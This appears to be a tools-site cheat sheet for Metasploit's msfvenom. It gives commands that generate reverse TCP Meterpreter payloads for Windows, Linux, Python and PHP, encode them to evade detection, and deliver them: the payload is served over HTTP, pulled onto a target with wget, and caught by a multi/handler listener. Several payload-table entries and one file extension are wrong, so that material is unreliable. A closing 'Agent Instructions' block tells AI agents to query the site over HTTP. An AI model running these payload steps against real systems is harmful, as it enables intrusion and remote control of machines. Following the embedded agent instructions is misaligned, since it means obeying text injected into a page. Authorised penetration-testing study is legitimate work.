# Msfvenom ## Introduction Msfvenom is the standalone command-line utility within the Metasploit Framework used to generate and encode custom payloads. ## Basic usage syntax ```bash msfvenom -p [options] -e -i -f -o ``` {% hint style="info" %} * `-p`: Specifies the payload to use. * `[options]`: Payload-specific options such as `LHOST` and `LPORT`. * `-e`: Specifies the encoder to use. * `-i`: Specifies the number of encoding iterations. * `-f`: Specifies the output format. * `-o`: Specifies the output file. {% endhint %} ## Commands #### List all the msfvenom payloads ```bash $ msfvenom -l payloads ``` #### List all the supported output formats ``` $ msfvenom -l formats ``` #### Generate a Reverse TCP Meterpreter payload for Windows ```bash $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe ``` (This command generates a Windows executable file (`payload.exe`) containing a reverse TCP Meterpreter payload that connects back to the attacker's machine at `192.168.1.100` on port `4444`) #### Generate and encoded payload ```bash $ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f elf -o payload.elf ``` (This command generates a Linux ELF executable (`payload.elf`) containing a reverse TCP Meterpreter payload, encoded five times using the `x86/shikata_ga_nai` encoder) #### Generate a python script for reverse shell ```bash $ msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o payload.py ``` #### Generate a PHP code for reverse shell ```bash $ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o payload.py ``` (Note: You need to edit the reverse\_shell.php file to convert it into a working PHP file by removing comments and adding closing tag) ## Multi Handler It is a msf module required to recieve and listen to the incoming connections. For using it, open up the msfconsole prompt using `msfconsole` command, then follow the given workflow: ```bash msf6> use exploit/multi/handler ``` ```bash msf6> set payload php/meterpreter/reverse_php ``` (The payload should be same as that used before to generate the msfvenom payload) ```bash msf6> set lhost 192.168.0.100 ``` (The lhost value should be the IP address for your local machine) ```bash msf6> set lport 4444 ``` (Set the unused port, which is the same as the one used in the msfvenom payload) ```bash msf6> run ``` ## Some payloads
Payload (-p)Format (-f)Output format (-o)
php/meterpreter/reverse_phpraw.php
python/meterpreter/reverse_phpraw.py
linux/x86/meterpreter/reverse_phpelf (linux executable and linkable format).elf
windows/meterpreter/reverse_phpexe.exe
cmd/unix/reverse_pythonraw.py
windows/meterpreter/reverse_phpasp.asp
php/meterpreter_reverse_phpraw.php
Note: You can view the required payload by using `grep` command along with the command to list the msfvenom payloads (`msfvenom -l paylaods`) ## Example Here is an example showcasing the basic workflow (We have access to the target machine and we want to create a reverse shell): 1. First connect to the target machine via `ssh` ```bash $ ssh [username]@[target_ip] ``` 2. Create a payload for reverse shell after connecting to the target machine (on local machine) ```bash $ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[local_machine_ip] LPORT=[port] -f elf > rev_shell.elf ``` 3. Then host it using python's http.server module (on local machine) ```bash $ python3 -m http.server [port] ``` (Alternatively, you can use Apache server in your local machine to host it) 4. Download the created reverse shell file in the accessed target machine (file was hosted in the given port on your local machine) ```bash $ wget http://[local_machine_ip]:[port]/rev_shell.elf ``` 5. Listen to the connection in your local machine using Multi Handler ```bash msf6> use exploit/multi/handler msf6> set payload linux/x86/meterpreter/reverse_tcp msf6> set lhost [local_machine_ip] msf6> set lport [port] msf6> run ``` 6. Finally run the .elf file for creating meterpreter session in the target machine connection ```bash $ ./rev_shell.elf ``` (You may need to give executable permission to the rev\_shell.elf file as: `sudo chmod 777 rev_shell.elf`) *Hence, you will have the meterpreter session in your local machie which was listening to connections using Multi Handler.* --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hacktools.aprasanna.com.np/metasploit/msfvenom.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.